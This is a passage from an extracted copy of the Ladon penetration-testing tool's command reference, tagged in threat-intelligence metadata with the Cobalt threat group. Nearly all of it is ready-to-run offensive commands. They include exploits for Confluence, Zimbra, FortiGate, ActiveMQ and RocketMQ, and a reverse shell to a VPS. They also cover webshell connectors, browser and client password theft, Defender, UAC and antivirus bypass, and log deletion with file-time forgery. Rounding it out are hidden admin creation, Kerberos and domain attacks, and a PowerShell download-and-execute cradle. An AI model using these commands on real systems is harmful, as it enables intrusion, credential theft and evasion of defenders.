删除Tomcat指定IP日志\r\nLadon LogDelTomcat access.log 192.168.1.8\r\n150 C#自定义程序集插件扫描\r\nhttps://github.com/k8gege/Ladon\r\nPage 24 of 41\n\nLadon 192.168.1.8/24 Poc.exe\r\nLadon 192.168.1.8/24 *.dll(c#)\r\n151 ReadFile 读取大文件前面指定长度内容\r\nLadon ReadFile c:\\k8.exe 默认1k\r\nLadon ReadFile c:\\k8.exe 1K\r\nLadon ReadFile c:\\k8.exe 1024K\r\nLadon ReadFile c:\\k8.exe 1M\r\n152 修改注册表读取2012及后系统明文密码\r\nLadon SetMzLogonPwd 1\r\n153 修改注册表劫持签名签证\r\nLadon SetSignAuth 1\r\n154 IP24 批量IP转成ip24格式(192.168.1.1/24)\r\nLadon ip.txt IP24\r\n155 IPC 批量IP转成ip C格式(192.168.1.)\r\nLadon ip.txt IPC\r\n156 IPB 批量IP转成ip B格式(192.168.)\r\nLadon ip.txt IPB\r\n157 漏洞检测Atlassian Confluence CVE-2022-26134\r\nLadon url.txt CVE-2022-26134\r\n158 Atlassian Confluence CVE-2022-26134 EXP\r\nLadon EXP-2022-26134 https://111.123.123.123 id\r\n159 RevShell-2022-26134 CVE-2022-26134反弹Shell\r\nLadon RevShell-2022-26134 TargetURL VpsIP VpsPort\r\nLadon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444\r\n160 SslInfo 证书探测设备、IP、域名、机器名、组织机构等信息\r\nhttps://github.com/k8gege/Ladon\r\nPage 25 of 41\n\nLadon https://k8gege.org SslInfo\r\nLadon k8gege.org SslInfo\r\nLadon k8gege.org:443 SslInfo 指定端口\r\nLadon noping fbi.gov SslInfo 禁ping探测\r\nLadon 192.168.1.1 SslInfo\r\nLadon 192.168.1.1:8443 SslInfo\r\n161 SslInfo 证书批量探测设备、IP、域名、机器名、组织机构等信息\r\nLadon ip.txt SslInfo\r\nLadon url.txt SslInfo\r\nLadon 192.168.1.1/c SslInfo\r\nLadon 192.168.1.1/b SslInfo\r\n162 WPinfo 多种方法获取WordPress主程序、主题、插件版本\r\nLadon https://k8gege.org WPinfo\r\nLadon k8gege.org WPinfo\r\nLadon noping fbi.gov WPinfo 禁ping探测\r\nLadon 192.168.1.1 WPinfo\r\nLadon 192.168.1.1:8443 WPinfo\r\n163 WPinfo 批量获取WordPress主程序、主题、插件版本\r\nLadon ip.txt WPinfo\r\nLadon url.txt WPinfo\r\nLadon 192.168.1.1/c WPinfo\r\nLadon 192.168.1.1/b WPinfo\r\n164 Exchange暴力破解 识别Exchange密码爆破\r\nLadon k8gege.org ExchangeScan\r\nLadon 192.168.1.8 ExchangeScan\r\nLadon 192.168.1.8、24 ExchangeScan\r\n165 CVE-2022-27925 批量探测Zimbra邮服ZIP目录穿越RCE漏洞\r\nLadon 192.168.1.8 CVE-2022-27925\r\nLadon http://zimbra.k8gege.org CVE-2022-27925\r\nLadon ip.txt CVE-2022-27925\r\nLadon url.txt CVE-2022-27925\r\nLadon 192.168.1.1/c CVE-2022-27925\r\nLadon 192.168.1.1/b CVE-2022-27925\r\n166 EXP-2022-27925 Zimbra邮服未授权RCE漏洞EXP GetShell\r\nLadon EXP-2022-27925 https://zimbra.k8gege.org poc.zip\r\n167 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)\r\nhttps://github.com/k8gege/Ladon\r\nPage 26 of 41\n\nLadon WebShell jsp ua https://zimbra.k8gege.org pass whoami\r\nJSP UAshell 查看系统版本、python、gcc等信息方便提权\r\nLadon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo\r\n168 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)\r\nLadon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami\r\n169 非交互式连接IIS-Raid后门执行命令\r\nLadon IISdoor http://192.168.1.142 whoami\r\nLadon IISdoor http://192.168.1.142 SIMPLEPASS whoami\r\n170 FindIP匹配IP段是否出现在漏洞结果中\r\nLadon FindIP ipc.txt ISVUL.txt (精确搜索)\r\nLadon FindIP ipc.txt ISVUL.txt like (模糊搜索)\r\n171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 路由器密码读取\r\nLadon https://192.168.1.8 CiscoPwd\r\nLadon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码\r\n172 PrinterPoc 打印机PJL任意代码执行漏洞批量检测\r\nLadon 192.168.1.8 PrinterPoc\r\nLadon ip.txt PrinterPoc\r\n禁ping机器扫描使用noping\r\nLadon noping 192.168.1.8 PrinterPoc\r\nLadon noping ip.txt PrinterPoc\r\n173 通过Mac查询制造商(Ladon Mac MAC地址)\r\nLadon Mac ff-ff-ff-ff-ff-ff\r\nLadon Mac 01:00:5e:00:00:16\r\nLadon Mac ff5e00885d66\r\n174 Cisco VPN路由器密码爆破(内置默认密码,支持明文、Hash)\r\nLadon 192.168.1.8/24 CiscoScan\r\nLadon https://192.168.1.8 CiscoScan\r\nLadon ip.txt CiscoScan\r\nLadon url.txt CiscoScan\r\n175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 笑脸后门漏洞检测 10.9移除\r\nhttps://github.com/k8gege/Ladon\r\nPage 27 of 41\n\nLadon noping ip CVE-2011-2523\r\nLadon noping ip.txt vsFTPdPoc\r\n176 WpScan WordPress密码审计、弱口令\r\nLadon http://192.168.1.8 WpScan\r\nLadon url.txt WpScan\r\nLadon 192.168.1.8/24 WpScan http 扫描IP时添加http://\r\n177 探测Exchange版本\r\nLadon https://192.168.1.8 ExchangeVer\r\nLadon 192.168.1.8/24 ExchangeVer\r\nLadon url.txt ExchangeVer\r\n178 Exchange高危RCE漏洞检测\r\nLadon https://192.168.1.8 ExchangePoc\r\n179 Http/S获取网页返回头信息\r\nLadon https://192.168.1.8 GetHead\r\nLadon ip.txt GetHead\r\nLadon 192.168.1.8/24 GetHead http 扫描IP时添加http://\r\nLadon ip.txt GetHead https 扫描IP时添加https://\r\n180 Http/S获取网页返回头信息+源码\r\nLadon https://192.168.1.8 GetHtml\r\nLadon ip.txt GetHtml\r\nLadon 192.168.1.8/24 GetHtml http\r\nLadon ip.txt GetHtml https 扫描IP时添加https://\r\n181 Http/S获取网页中的域名\r\nLadon https://192.168.1.8 GetDomain\r\nLadon ip.txt GetDomain\r\nLadon 192.168.1.8/24 GetDomain http\r\nLadon ip.txt GetDomain https 扫描IP时添加https://\r\n182 TrueIP绕过CDN获取域名真实IP(可用域名、标题、Banner等唯一关键字特征)\r\nLadon ip.txt TrueIP k8gege.org\r\nLadon 192.168.1.8/24 TrueIP k8gege.org\r\nLadon ip.txt TrueIP \"K8哥哥\"\r\nLadon 192.168.1.8/24 TrueIP \"K8哥哥\"\r\nhttps://github.com/k8gege/Ladon\r\nPage 28 of 41\n\n183 Firefox密码\\Cookie\\历史记录读取\r\nLadon FirefoxPwd\r\nLadon FirefoxHistory\r\nLadon FirefoxCookie\r\n184 BypassUAC11无回显支持Win7、Win8、Win11 Win2012\\2016\\2019等 10.8版本移除\r\nLadon40 BypassUAC11 cmd\r\nLadon40 BypassUAC11 c:\\1.bat\r\nLadon40 BypassUAC11 c:\\1.exe\r\n185 GetPwd支持Navicat、TeamView、Xshell、SecureCRT密码读取\r\nLadon GetPwd\r\n186 DraytekScan 密码审计Draytek弱口令检测\r\nLadon 192.168.1.8 DraytekScan\r\nLadon https://192.168.1.8 DraytekScan\r\nLadon 192.168.1.8/24 DraytekScan\r\nLadon url.txt DraytekScan\r\n187 XshellPwd Xshell密码读取\r\nLadon XshellPwd\r\nhttps://github.com/k8gege/Ladon\r\nPage 29 of 41\n\n188 FortiGate CVE-2022-40684 未授权写SSH-KEY admin admin123\r\nLadon 192.168.1.8 CVE-2022-40684\r\nLadon https://192.168.1.8 CVE-2022-40684\r\nLadon 192.168.1.8/24 CVE-2022-40684\r\nLadon url.txt CVE-2022-40684\r\n189 MssqlCmd SQL Server远程执行命令 SQL版本、OS信息 xp_cmdshell\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master info\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami\r\n190 MssqlCmd SQL Server远程执行命令 efspotato、badpotato提权\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami\r\nLadon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami\r\n191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42版本密码读取\r\nLadon 192.168.1.8 CVE-2018-14847\r\nLadon ip.txt CVE-2018-14847\r\n192 ZteScan 中兴路由器光猫Web默认口令检测\r\nLadon 192.168.1.8 ZteScan\r\nLadon ip.txt ZteScan\r\nLadon http://192.168.1.8 ZteScan\r\nLadon url.txt ZteScan\r\n193 MSNSwitchPwd CVE-2022-32429 MSNSwitch路由器密码读取\r\nLadon https://192.168.1.8 MSNSwitchPwd\r\nLadon url.txt MSNSwitchPwd\r\n194 NetGearPwd NetGear DGND3700v2路由器密码读取\r\nLadon https://192.168.1.8 NetGearPwd\r\nLadon url.txt NetGearPwd\r\n195 T3协议探测WebLogic版本\r\nhttps://github.com/k8gege/Ladon\r\nPage 30 of 41\n\nLadon 192.168.1.8/24 T3Info\r\nLadon 192.168.1.8:7001 T3Info\r\nLadon http://192.168.1.8:7001 T3Info\r\n一键渗透 InfoScan AllScan PocScan ExpScan VerScan\r\nimage\r\n196 InfoScan多个模块探测系统信息\r\nLadon 192.168.1.8/24 InfoScan\r\nLadon 192.168.1.8 InfoScan\r\nLadon ip.txt InfoScan\r\n197 VulScan PocScan多个远程漏洞检测\r\nLadon 192.168.1.8/24 VulScan\r\nLadon 192.168.1.8 PocScan\r\nLadon http://192.168.1.8 PocScan\r\n198 ExpScan多个漏洞利用GetShell\r\nLadon 192.168.1.8/24 ExpScan\r\nLadon 192.168.1.8 ExpScan\r\nLadon http://192.168.1.8 ExpScan\r\n199 JoomlaPwd CVE-2023-23752 未授权网站数据库密码读取\r\nLadon 192.168.1.8/24 JoomlaPwd\r\nLadon 192.168.1.8 JoomlaPwd\r\nLadon http://192.168.1.8 JoomlaPwd\r\nLadon url.txt JoomlaPwd\r\n200 AllScan 所有模块\r\nLadon 192.168.1.8/24 AllScan\r\nLadon 192.168.1.8 AllScan\r\nLadon http://192.168.1.8 AllScan\r\n201 探测Citrix Gateway版本\r\nLadon https://192.168.1.8 CitrixVer\r\nLadon 192.168.1.8/24 CitrixVer\r\nLadon url.txt CitrixVer\r\n202 探测Vmware Vcenter版本\r\nLadon https://192.168.1.8 VmwareVer\r\nLadon 192.168.1.8/24 VmwareVer\r\nhttps://github.com/k8gege/Ladon\r\nPage 31 of 41\n\nLadon url.txt VcenterVer\r\n203 绕过Defender执行PowerShell\r\nLadon RunPS -f hello.ps1\r\nLadon RunPS -c \"echo test\"\r\nLadon RunPS bypass\r\nLadon RunPS default\r\n204 SNMP重启HP打印机\r\nLadon HPreboot 192.168.1.8\r\nLadon HPreboot 192.168.1.8 public\r\n205 清理操作日志 禁用.NET日志记录\r\nLadon Clslog\r\n206 ARP协议探测存活主机\r\nLadon 192.168.1.8 ArpInfo\r\nLadon 192.168.1.8/24 ArpInfo\r\n207 迷你FTP服务器,(支持windows/Linux自带ftp命令实现文件上传下载)\r\nLadon FtpServer 21\r\nLadon Ftp 2121\r\nLadon Ftp 2121 admin admin\r\n208 监听TCP发包数据 保存TXT和HEX 如SMB RDP HTTP SSH LDAP FTP等协议\r\nLadon Tcp 8080\r\nLadon TcpServer 80\r\n209 监听UDP发包数据 保存TXT和HEX 如DNS、SNMP等协议\r\nLadon UdpServer 8080\r\nLadon Udp 161\r\n210 PortForward 端口转发 端口中转\r\nLadon PortForward \u003clocalPort\u003e \u003ctargetHost\u003e \u003ctargetPort\u003e\r\nExample:\r\nLadon PortForward 338 192.168.1.8 3389\r\nTest: mstsc 127.0.0.1 338\r\n211 CVE-2022-36537 Server Backup Manager 未授权RCE漏洞检测 (Zookeeper)\r\nhttps://github.com/k8gege/Ladon\r\nPage 32 of 41\n\nLadon https://192.168.1.8 CVE-2022-36537\r\nLadon 192.168.1.8/24 CVE-2022-36537\r\nLadon url.txt CVE-2022-36537\r\n212 EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)\r\nLadon EXP-2022-36537 url\r\nLadon EXP-2022-36537 url /WEB-INF/web.xml\r\n213 彻底关闭SMB、禁用445 阻止0day、横向移动、中继攻击等\r\nLadon CloseSMB\r\n214 禁用指定服务\r\nLadon DisService Spooler\r\nLadon DisableService Spooler\r\n215 停止指定服务\r\nLadon StopService Spooler\r\n216 放行端口 开放端口\r\nLadon OpenTCP 445\r\nLadon OpenUDP 161\r\n217 阻止端口 拦截端口\r\nLadon CloseTCP 445\r\nLadon CloseUDP 161\r\n218 RunToken复制令牌执行程序\r\nLadon RunToken explorer cmd.exe\r\nLadon RunToken explorer c:\\1.bat\r\n219 RunSystem提权 管理员权限提升至SYSTEM权限\r\nLadon RunSystem cmd.exe\r\nLadon RunUser cmd.exe\r\nLadon RunSystem c:\\1.exe\r\n220 RunUser降权 System权限降至用户执行程序\r\nLadon RunUser cmd.exe\r\nhttps://github.com/k8gege/Ladon\r\nPage 33 of 41\n\nLadon RunUser c:\\1.exe\r\n221 GodPotato提权Win8-Win11 Win2012-Win2022\r\nLadon GodPotato whoami\r\n222 hikvision 海康威视 密码审计\r\nLadon 192.168.1.8/24 HikvisionScan\r\nLadon http://192.168.1.8:8080 HikvisionScan\r\nLadon url.txt HikvisionScan\r\n223 hikvision 海康威视 CVE-2017-7921漏洞检测\r\nLadon 192.168.1.8/24 HikvisionPoc\r\nLadon http://192.168.1.8:8080 HikvisionPoc\r\nLadon url.txt HikvisionPoc\r\n224 hikvision 海康威视 配置文件解密\r\nLadon HikvisionDecode configurationFile\r\n225 Ladon测试专用CmdShell\r\nLadon web 800 cmd\r\n226 连接测试专用CmdShell\r\nLadon cmdshell http://192.168.50.2:888 cmd whoami\r\n浏览器访问 http://192.168.1.8:800/shell?cmd=whoami\r\n227 查看域管理员\r\nLadon QueryAdminDomain\r\n228 查看域信息\r\nLadon QueryDomain\r\n229 Mndp协议广播探测同网段Mikrotik路由器信息\r\nLadon MndpInfo\r\nLadon RouterOS\r\nLadon Mikrotik\r\n230 PostShell连接工具,支持自定义HTTP头提交\r\nhttps://github.com/k8gege/Ladon\r\nPage 34 of 41\n\nLadon PostShell \u003cmethod\u003e \u003curl\u003e \u003cpwd\u003e \u003ctype\u003e \u003ccmd\u003e\r\nLadon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami\r\nLadon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p\r\nLadon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami\r\nLadon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p\r\nLadon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami\r\nLadon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p\r\nLadon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami\r\nLadon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p\r\nLadon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami\r\nLadon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p\r\nLadon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami\r\nLadon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p\r\nLadon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p\r\n231 RunCmd/Cmd 执行Cmd命令/支持b64cmd\r\nLadon cmd whoami\r\nLadon b64cmd d2hvYW1p\r\n232 查看管理员IP、一键读取登陆成功日志4624\r\nLadon LoginLog\r\nLadon EventLog\r\n233 Apache RocketMQ CVE-2023-33246 远程命令执行漏洞EXP\r\nLadon RocketMQexp \u003cip\u003e 10911 \u003ccommand\u003e\r\nLadon RocketMQexp 192.168.1.8 10911 \"wget http://192.168.1.8/isvul\"\r\n234 Ladon一键免杀工具\r\nLadon BypassAV py xor anyNet.exe\r\n235 Win11/2022系统提权至system权限\r\nLadon McpPotato whoami\r\n236 EXE转HEX,CMD命令写入文件\r\nLadon Exe2Hex 1.exe\r\n237 EXE转Base64,CMD命令写入文件\r\nhttps://github.com/k8gege/Ladon\r\nPage 35 of 41\n\nLadon Exe2B64 1.exe\r\n238 ZimbraVer Zimbra邮件系统版本探测\r\nLadon 192.168.1.8/24 ZimbraVer\r\nLadon http://192.168.1.8:8080 ZimbraVer\r\nLadon url.txt ZimbraVer\r\n239 SharpGPO域渗透 组策略横向移动工具\r\nLadon SharpGPO\r\nLadon SharpGPO --Action GetOU\r\nLadon SharpGPO --Action GetOU --OUName \"IT Support\"\r\nLadon SharpGPO --Action NewOU --OUName \"IT Support\"\r\nLadon SharpGPO --Action NewOU --OUName \"App Dev\" --BaseDN \"OU=IT Support,DC=testad,DC=com\"\r\nLadon SharpGPO --Action MoveObject --SrcDN \"CN=user01,CN=Users,DC=testad,DC=com\" --DstDN \"OU=IT Support,DC=tes\r\nLadon SharpGPO --Action MoveObject --SrcDN \"CN=user01,OU=IT Support,DC=testad,DC=com\" --DstDN \"CN=Users,DC=tes\r\nLadon SharpGPO --Action RemoveOU --OUName \"IT Support\"\r\nLadon SharpGPO --Action RemoveOU --DN \"OU=IT Support,DC=testad,DC=com\"\r\nLadon SharpGPO --Action GetGPO\r\nLadon SharpGPO --Action GetGPO --GPOName testgpo\r\nLadon SharpGPO --Action NewGPO --GPOName testgpo\r\nLadon SharpGPO --Action RemoveGPO --GPOName testgpo\r\nLadon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8\r\nLadon SharpGPO --Action GetGPLink\r\nLadon SharpGPO --Action GetGPLink --DN \"OU=IT Support,DC=testad,DC=com\"\r\nLadon SharpGPO --Action GetGPLink --GPOName testgpo\r\nLadon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8\r\nLadon SharpGPO --Action NewGPLink --DN \"OU=IT Support,DC=testad,DC=com\" --GPOName testgpo\r\nLadon SharpGPO --Action NewGPLink --DN \"OU=IT Support,DC=testad,DC=com\" --GUID F3402420-8E2A-42CA-86BE-4C5594F\r\nLadon SharpGPO --Action RemoveGPLink --DN \"OU=IT Support,DC=testad,DC=com\" --GPOName testgpo\r\nLadon SharpGPO --Action RemoveGPLink --DN \"OU=IT Support,DC=testad,DC=com\" --GUID F3402420-8E2A-42CA-86BE-4C55\r\nLadon SharpGPO --Action GetSecurityFiltering --GPOName testgpo\r\nLadon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8\r\nLadon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice\r\nLadon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup \"Domain Users\"\r\nLadon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER\r\nLadon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount \"Authenticated Users\"\r\nLadon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice\r\nLadon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup \"Domain\r\nLadon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-https://github.com/k8gege/Ladon\r\nPage 36 of 41\n\nLadon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount \"Authenti\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup \"Domain Users\"\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount \"Authenticated Users\"\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup \"Dom\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer W\r\nLadon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount \"Authe\r\n240 IIS网站信息一键获取\r\nLadon IisInfo\r\n241 渗透专用WEB服务器LDAP反序列化\r\nLadon web 800 ldap=192.168.1.8:800\r\n242 渗透专用WEB服务器RMI反序列化\r\nLadon web 800 rmi=192.168.1.8\r\n243 API添加管理员(无视系统net、net1禁用)\r\nLadon AddAdmin admin$ 123456\r\n244 API添加用户(无视系统net、net1.exe禁用)\r\nLadon AddUser admin$ 123456\r\n245 API删除用户(无视系统net、net1.exe禁用)\r\nLadon DelUser admin$\r\n246 Rubeus域渗透 Kerberos攻击\r\n比如TGT请求/ST请求/AS-REP Roasting/Kerberoasting/委派攻击/黄金票据/白银票据/钻石票据/蓝宝石票据等\r\nLadon Rubeus\r\n247 noPac域渗透 域内提权CVE-2021-42287/CVE-2021-42278\r\nCVE-2021-42287/CVE-2021-42278 Scanner \u0026 Exploiter\r\n/domain /user /pass argument needed for scanning\r\n/dc /mAccount /nPassword argument needed for exploitation\r\nExamples:\r\nhttps://github.com/k8gege/Ladon\r\nPage 37 of 41\n\nLadon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'\r\n Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!\r\n Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /\r\n Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo12\r\n248 SharpGPOAbuse\r\nLadon SharpGPOAbuse\r\n249 SharpSphere 与vCenter管理的虚拟机的来宾操作系统进行交互 执行命令\r\nLadon SharpSphere\r\n No verb selected.\r\n dump Snapshot and download memory dump file\r\n list List all VMs managed by this vCenter\r\n execute Execute given command in target VM\r\n c2 Run C2 using C3's VMwareShareFile module\r\n upload Upload file to target VM\r\n download Download file from target VM\r\n help Display more information on a specific command.\r\n version Display version information.\r\n250 Dcom远程执行命令之MMC20\r\nLadon MmcExec host cmdline\r\nLadon MmcExec 127.0.0.1 calc\r\nLadon MmcExec 127.0.0.1 Y2FsYw==\r\n251 Dcom远程执行命令之ShellWindows\r\nLadon ShellExec host cmdline\r\nLadon ShellExec 127.0.0.1 calc\r\nLadon ShellExec 127.0.0.1 Y2FsYw==\r\n252 Dcom远程执行命令之ShellBrowserWindow\r\nLadon ShellBrowserExec host cmdline\r\nLadon ShellBrowserExec 127.0.0.1 calc\r\nLadon ShellBrowserExec 127.0.0.1 Y2FsYw==\r\n253 Smtp Ntlm探测系统信息(25、465、587端口)\r\nhttps://github.com/k8gege/Ladon\r\nPage 38 of 41\n\nLadon 192.168.1.8/24 SmtpInfo\r\n254 HTTP/S Ntlm探测系统信息\r\nLadon 192.168.1.8/24 HttpInfo\r\n255 ActiveMQ CVE-2023-46604 RCE Exploit\r\nLadon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml\r\n256 DomainLog DomainUserIP 远程查询域用户IP\r\n Ladon DomainLog -d 7\r\n Ladon DomainLog -h ip -d 7\r\n Ladon DomainLog -h ip -d 7 -grep user\r\n Ladon DomainLog -h ip -u username -p password -d 7\r\n Ladon DomainLog -h ip -u username -p password -d 7 -all\r\n Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\\path\\res\r\nult.txt\r\n257 检测用户是否Lotus管理员\r\nLadon LotusAdmin http://192.168.1.1\r\nLadon LotusAdmin http://192.168.1.1/adm.nsf\r\n258 HTA服务器 一键启动 访问DOC也能执行HTA\r\nLadon HtaSer\r\nLadon HtaSer 8080\r\n259 ConfVer ConfluenceVer探测Confluence版本\r\nLadon 192.168.1.8/24 ConfVer\r\nLadon http://192.168.1.8:8080 ConfVer\r\nLadon url.txt ConfVer\r\n260 FindAD 可用于查找活动目录用户登陆的位置、枚举域用户\r\nLadon FindAD \u003cparameters\u003e\r\nLadon pveFindADUser \u003cparameters\u003e\r\n261 Oracle数据库远程提权工具 官方驱动\u003e=.net 4.8\r\nLadon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami\r\n262 Oracle数据库远程提权工具 3种方法一键提权\r\nhttps://github.com/k8gege/Ladon\r\nPage 39 of 41\n\nLadon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami\r\nLadon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami\r\nLadon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami\r\nBuildCS 动态编译c#代码文件\r\nLadon BuildCS exe.cs exe\r\nLadon BuildCS dll.cs dll\r\nLadon BuildCS exe.cs dat\r\n修改文件时间 指定文件时间\r\nUsage: Ladon UpdateFileTime \u003cfile_path\u003e\r\nLadon UpdateFileTime E:\\Ladon911\\Ladon.exe \"2024-09-11 09:11:00\"\r\n修改文件时间 复制文件时间\r\nLadon CopyFileTime E:\\Ladon911\\LadonExp.exe E:\\Ladon911\\Ladon.exe\r\nPowerShell版本 Ladon.ps1\r\n0x001 Cmd交互执行\r\npowershell\r\nImport-Module .\\Ladon.ps1\r\nLadon OnlinePC\r\n0x002 本地非交互执行\r\npowershell -exec bypass Import-Module .\\Ladon.ps1;Ladon whoami\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass Import-Module .\\Ladon.ps1;Ladon whoami\r\n0x003 远程内存加载执行\r\npowershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon Onlin\r\n0x004 Bypass绕过PowerShell默认策略执行\r\npowershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon OnlinePC\r\n0x005 自定义端口扫描\r\npowershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon PortScan '22,80,135,445'\r\nCobalt Strike Ladon.ps1\r\nhttps://github.com/k8gege/Ladon\r\nPage 40 of 41\n\nCS Beacon 探测存活主机\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon ICMP\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon NbtInfo\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon SmbInfo\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon LdapInfo\r\nCS Beacon 自定义端口扫描\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon PortScan '22,80,135,445'\r\nCS Beacon MS17010漏洞探测\r\nshell powershell -ExecutionPolicy Bypass Import-Module .\\Ladon.ps1;Ladon 192.168.1.1/24 ms17010\r\n=======================================================\r\nExample\r\nhttp://k8gege.org/Ladon/example-en.html\r\nLatest version\r\nLatest version in small seal ring: http://k8gege.org/Ladon/update.txt\r\nStargazers over time\r\n0\r\n590\r\n1180\r\n1770\r\n2360\r\n2950\r\n3540\r\n4130\r\n4720\r\n5300\r\nStargazers\r\n2019-11-09 2020-07-26 2021-04-12 2021-12-28 2022-09-14 2023-06-01 2024-02-15 2024-11-01 2025-07-19 2026-04-05\r\nTime\r\nSource: https://github.com/k8gege/Ladon\r\nhttps://github.com/k8gege/Ladon\r\nPage 41 of 41\n\nLadon ip.txt Ladon url.txt CiscoScan CiscoScan​ \n175 vsFTPdPoc CVe-2011-2523 vsftpd 2.3.4 笑脸后门漏洞检测 10.9移除\n Page 27 of 41", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://github.com/k8gege/Ladon" ], "report_names": [ "Ladon" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434911, "ts_updated_at": 1775791464, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4ecba9019983b7da86f5b669323b7cbe39e7cb1e.pdf", "text": 